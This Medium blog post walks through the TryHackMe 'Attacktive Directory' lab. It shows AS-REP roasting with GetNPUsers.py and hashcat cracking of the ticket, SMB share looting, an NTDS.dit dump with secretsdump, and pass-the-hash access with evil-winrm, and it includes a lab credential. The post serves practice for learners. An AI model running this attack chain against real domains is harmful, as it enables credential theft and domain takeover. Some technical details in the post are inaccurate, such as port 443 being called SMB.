Open in app

Sign in

Write

Sign in

Attacking Active Directory: TryHackMe

Siddhesh Parab
6 min readJul 12, 2022

Today, we are up with yet a new walkthrough, but the domain is something interesting. We would be looking at a room on TryHackMe called “Attacktive Directory” which emphasizes on Active Directory pentesting and would be looking at how to enumerate domain controllers, enumerate users, abusing Kerberos, and at least privilege escalation in Active Directory. So, without wasting any time let's start with the fun.

[Task2]: Setting up the environment

To start with, we need to properly set up the environment. This includes installing various tools. First, we need to install impacket which series of scripts dedicated towards Windows, SMB pentesting, etc..

git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacketpip3 install -r /opt/impacket/requirements.txtcd /opt/impacket/ && python3 ./setup.py install

Now we need to install the Bloodhound and its dependencies called neo4j which would be useful during our pen-testing process, using the APT package manager.

apt install bloodhound neo4j

[Task3]: Network Enumeration

We have been given an IP address of a machine which we need to scan to find the open ports and the services running and them. Using the Nmap we scan for open ports.

The open services are clear indications that the machine is a Windows machine running Active Directory.

(#1) What tool will allow us to enumerate port 139/445?

We will be using “enum4linux” to enumerate the SMB open ports.

(#2) What is the NetBIOS-Domain Name of the machine?

Even using the Nmap default scripts we can get the NetBIOS-Domain Name of the machine. The NetBIOS-Domain name is assigned using the computer’s inbuilt network identification system.

(#3) What invalid TLD do people commonly use for their Active Directory Domain?

People commonly use the .local. TLD which is actually invalid.

[Task4]: Enumerating Users via Kerbrute

The first and foremost thing is to know what are the user accounts existing in the domain. For this we will be using the tool called Kerbrute.

(#1)What command within Kerbrute will allow us to enumerate valid usernames?

We will be using the userenum command of Kerbrute to enumerate the number of valid users in the domain.

(#2)What notable account is discovered?

We found the following worth noticing the usernames. That is svc-admin

(#3)What is the other notable account is discovered? (These should jump out at you)

The other username that was notable is backup .

[Task5]: Abusing Kerberos(AS-REP Roasting)

The AS-REP roasting is a type of attack for user accounts that do not require “Kerberos preauthentication”. Preauthentication is a mechanism where the user’s password is sent to the domain controller along the current timestamp. hence, this disables the chances of replay attacks and brute-force attacks.

Usually by default preauthentication is enabled for all user accounts, but can be found enabled under certain circumstances. During such times the attacker who doesn’t have any special permissions can request the domain controller for a Kerberos ticket of a particular known user and later try to brute-force the encrypted ticket offline.

To retrieve the Kerberos Tickets we will be using a script called GetNPUsers.py form the Impacket library of scripts.

(#1)We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

To retrieve the Kerberos Tickets we will be using a script called GetNPUsers.py form the Impacket library of scripts.

GetNPUsers.py spookysec.local/svc-admin -no-pass

It is found that we could query the ticket without a password for the svc-admin account.

(#2)Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)

The hashcat examples wiki page shows the various types of hashes for which hashcat has capabilities to crack them. The usual schema/syntax of a particular hash is also displayed. This makes looking for the exact hashing algorithm easy for the user.

Kerberos 5 AS-REP etype 23

(#3)What mode is the hash?

The hashcat tool help section hashcat --help displays the mode or number we need to use to the particular hashes to crack them. The help section states we need to use 18200 mode to crack our hash.

hashcat -m 18200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt — force

Now, we have the password of user svc-admin we need to see where we can use it to pivot further. We can recall that port 443 SMB was open. Let's try these credentials there.

[Task6]: Enumerating SMB

(#1)What utility can we use to map remote SMB shares?

We can use smbclient tool to check out the SMB shares.

(#2)Which option will list shares?

Suing the help section of smbclient we can see that -L flag is used to view the SMB shares.

(#3)How many remote shares is the server listing?

The server is listing shows us a total of 6 shares.

(#4)There is one particular share that we have access to that contains a text file. Which share is it?

Upon enumerating all the shares I found out that, the backup share contains a text file with an interesting name.

(#5)What is the content of the file?

Using the mget command I downloaded the text file into my local system.

(#6)Decoding the contents of the file, what is the full contents?

Just by looking at the file content I came to know that this is a Base64 encoded snippet. So, I went ahead and decoded it.

backup@spookysec.local:backup2517860

[Task7]: Elevating Privileges within the Domain

(#1)What method allowed us to dump NTDS.DIT?

Now that we have the credentials of the host which acts like a backup destination for the main domain controller, there are chances of a NTDS.dit file to exist on this backup host too. For this, we can make use a script from the Impacket repository called secretsdump.py . This python script holds the capabilities of dumping the SAM(Security Account Manager), LSA secrets form registries, NTLM hashes, plain text credentials, NTDS.dit file etc. So, lets run this tool and check out what all output does it give.

(#2)What is the Administrators NTLM hash?

We can see that secretsdump.py gave us the “Administrator” user LM/NTLM hashes from the NITDS.dit file.

(#3)What method of attack could allow us to authenticate as the user without the password?

Now that we have the hashes for the required Administrator account, we explore a famous method of attack called as “pass-the-hash” attack. I will be using another famous tool called evil-winrm which has the capabilities of exploiting the Windows Remote Management(WinRM) services. Had not mentioned the specific tool, to be used I would use a tool called psexec.py from the Impacket repository.

(#4)Using a tool called Evil-WinRM what option will allow us to use a hash?

Using the help section we get to know that the -H flag will accept the hash. And with the required flags set, we are granted access to the host machine as a administrator privileges.

With this we complete another great room provided by TryHackMe. That’s it for today, would come up with another great article soon. Till then, keep grinding and keep learning new stuff !!!

Tryhackme
Red Team
Information Security
Active Directory
Pentesting

--

--

Siddhesh Parab

Written by Siddhesh Parab

212 Followers

Cyber Security | n00b | Learner

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams